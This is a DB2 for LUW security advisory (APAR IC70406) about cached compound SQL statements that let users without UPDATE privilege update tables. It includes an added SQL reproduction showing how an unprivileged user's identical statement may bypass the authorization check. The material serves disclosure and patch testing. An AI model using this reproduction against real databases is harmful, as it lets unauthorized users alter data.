IC70406: SECURITY: UPDATE AGAINST A TABLE VIA A COMPOUND SQL (COMPILED) STATEMENT MAY BE EXECUTED BY USER WITHOUT REQUIRED PRIVILEGES


APAR status

  • Closed as program error.

Error description

  • When a user who holds the required privileges issues a compound SQL
    (compiled) statement, the compiled statement is stored in the
    dynamic SQL cache. A later user who issues the same statement text
    can reuse the cached entry, provided the authorization check
    confirms that this user also holds the privileges the statement
    needs.
    
    The defect is in that check when the compound SQL (compiled)
    statement contains an UPDATE statement against a table. Once the
    statement has been compiled (via a PREPARE or EXECUTE IMMEDIATE
    request) by a user with UPDATE privilege on the table, a second user
    who lacks UPDATE privilege on that table and issues the identical
    statement might match the cached entry and execute it successfully,
    updating the table without the required privilege.
    
    The problem is confined to UPDATE privilege, to compound SQL
    (compiled) statements, and to statements that are already in the
    cache; a statement that misses the cache is compiled and authorized
    against the issuing user's own privileges.
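The sequence described above, written out as DB2 for LUW SQL. This is an added example and is not part of the APAR; the schema ADMIN, table ACCOUNTS, and users ALICE (holds UPDATE) and BOB (holds SELECT only) are assumed names. Step 2 repeats the statement text of step 1 byte for byte, because only an identical statement can resolve to the cached entry; on a fixed level step 2 fails with SQL0551N, while on an affected level it may run the UPDATE.

```sql
-- Added example, not from the APAR. Assumed names: schema ADMIN, table ACCOUNTS,
-- users ALICE (holds UPDATE) and BOB (holds SELECT only). Run with a non-default
-- statement terminator so the semicolons inside the compound body are not
-- treated as terminators, e.g.:  db2 -td@ -f example.sql

-- Setup, run as ADMIN.
CREATE TABLE admin.accounts (
  id      INTEGER       NOT NULL PRIMARY KEY,
  balance DECIMAL(12,2) NOT NULL
)@
INSERT INTO admin.accounts VALUES (1, 100.00), (2, 50.00)@
GRANT SELECT, UPDATE ON admin.accounts TO USER alice@
GRANT SELECT         ON admin.accounts TO USER bob@

-- Step 1, run as ALICE. The compound SQL (compiled) statement is compiled,
-- authorized against ALICE's privileges, executed, and its entry is placed
-- in the dynamic SQL cache.
BEGIN
  DECLARE v_rows INTEGER DEFAULT 0;
  UPDATE admin.accounts SET balance = balance - 10.00 WHERE id = 1;
  GET DIAGNOSTICS v_rows = ROW_COUNT;
  IF v_rows <> 1 THEN
    SIGNAL SQLSTATE '75001' SET MESSAGE_TEXT = 'expected exactly one row';
  END IF;
END@

-- Step 2, run as BOB, who holds no UPDATE privilege on ADMIN.ACCOUNTS. The
-- text is identical to step 1 so that it can match the cached entry.
--   Fixed level:    fails with SQL0551N (no UPDATE privilege on ADMIN.ACCOUNTS)
--   Affected level: may resolve to the cached entry and run the UPDATE
BEGIN
  DECLARE v_rows INTEGER DEFAULT 0;
  UPDATE admin.accounts SET balance = balance - 10.00 WHERE id = 1;
  GET DIAGNOSTICS v_rows = ROW_COUNT;
  IF v_rows <> 1 THEN
    SIGNAL SQLSTATE '75001' SET MESSAGE_TEXT = 'expected exactly one row';
  END IF;
END@

-- Checks, run as ADMIN: BOB's row must show UPDATEAUTH = 'N', and after
-- step 2 the balance of row 1 must still be 90.00 (100.00 minus ALICE's
-- single update). A balance of 80.00 means BOB's statement ran.
SELECT grantee, updateauth
  FROM syscat.tabauth
 WHERE tabschema = 'ADMIN' AND tabname = 'ACCOUNTS'@
SELECT balance FROM admin.accounts WHERE id = 1@
```

The statement `FLUSH PACKAGE CACHE DYNAMIC` evicts the entries currently in the dynamic SQL cache, so a compound statement already cached by a privileged user can no longer be matched until it is compiled again; it does not remove the defect, since the next privileged execution caches the statement anew, so it is only a stopgap alongside the local fix above.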
    

Local fix

  • Avoid UPDATE statements in compound SQL (compiled) statements until
    the fix is applied
    

Problem summary

  • ****************************************************************
    * USERS AFFECTED:                                              *
    * compound SQL (compiled) statements with table updates        *
    ****************************************************************
    * PROBLEM DESCRIPTION:                                         *
    * unauthorized user able to issue cached compound SQL          *
    * (compiled) statement with update statement                   *
    ****************************************************************
    * RECOMMENDATION:                                              *
    * move to DB2 for LUW version 9.7 Fix Pack 3                   *
    ****************************************************************
    

Problem conclusion

  • Fixed in DB2 for LUW version 9.7 Fix Pack 3
    

Temporary fix

Comments

APAR Information

  • APAR number

    IC70406

  • Reported component name

    DB2 FOR LUW

  • Reported component ID

    DB2FORLUW

  • Reported release

    970

  • Status

    CLOSED PER

  • PE

    NoPE

  • HIPER

    NoHIPER

  • Special Attention

    NoSpecatt

  • Submitted date

    2010-08-05

  • Closed date

    2010-09-14

  • Last modified date

    2010-09-14

  • APAR is sysrouted FROM one or more of the following:

  • APAR is sysrouted TO one or more of the following:

    IC70408

Fix information

  • Fixed component name

    DB2 FOR LUW

  • Fixed component ID

    DB2FORLUW

Applicable component levels

  • R970 PSN

       UP

  • R980 PSN

       UP




Document information


More support for:

DB2 for Linux, UNIX and Windows

Software version:

9.7

Reference #:

IC70406

Modified date:

2010-09-14
